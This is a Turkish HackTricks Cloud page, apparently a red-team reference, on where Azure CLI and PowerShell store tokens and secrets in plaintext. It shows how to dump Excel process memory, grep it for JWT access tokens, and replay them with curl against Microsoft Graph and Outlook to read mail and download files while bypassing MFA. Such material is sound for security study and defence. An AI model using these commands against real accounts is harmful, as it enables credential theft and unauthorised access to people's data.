Az - Yerel Bulut Kimlik Bilgileri
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
Yerel Token Depolama ve Güvenlik Hususları
Azure CLI (Komut Satırı Arayüzü)
Tokenlar ve hassas veriler Azure CLI tarafından yerel olarak depolanır, bu da güvenlik endişeleri doğurur:
- Erişim Tokenları:
C:\Users\<username>\.AzurekonumundakiaccessTokens.jsoniçinde düz metin olarak saklanır. - Abonelik Bilgileri: Aynı dizinde bulunan
azureProfile.json, abonelik detaylarını tutar. - Log Dosyaları:
.azureiçindekiErrorRecordsklasörü, maruz kalmış kimlik bilgileri içeren loglar barındırabilir, örneğin:
- Kimlik bilgileri gömülü olarak yürütülen komutlar.
- Tokenlar kullanılarak erişilen URL’ler, hassas bilgileri açığa çıkarabilir.
Azure PowerShell
Azure PowerShell de tokenlar ve hassas verileri yerel olarak depolar:
- Erişim Tokenları:
C:\Users\<username>\.AzurekonumundakiTokenCache.dat, erişim tokenlarını düz metin olarak saklar. - Hizmet Prensibi Gizli Anahtarları: Bunlar
AzureRmContext.jsoniçinde şifrelenmemiş olarak saklanır. - Token Kaydetme Özelliği: Kullanıcılar, yetkisiz erişimi önlemek için dikkatli bir şekilde kullanılmalıdır.
Onları Bulmak için Otomatik Araçlar
Bellekteki Tokenlar
bu videoda açıklandığı gibi, bulut ile senkronize olan bazı Microsoft yazılımları (Excel, Teams…) erişim tokenlarını bellek içinde düz metin olarak saklayabilir. Bu nedenle, sürecin belleğini dökerek ve JWT tokenları için grep yaparak kurbanın buluttaki çeşitli kaynaklarına MFA’yı atlayarak erişim sağlayabilirsiniz.
Adımlar:
- EntraID kullanıcısıyla senkronize olan excel süreçlerini favori aracınızla dökün.
string excel.dmp | grep 'eyJ0'komutunu çalıştırın ve çıktıda birkaç token bulun.- Sizi en çok ilgilendiren tokenları bulun ve bunlar üzerinde araçlar çalıştırın:
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq
# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq
## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq
## Finally, download a file from that drive:
curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
Bu tür erişim jetonlarının diğer süreçlerin içinde de bulunabileceğini unutmayın.
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
HackTricks Cloud

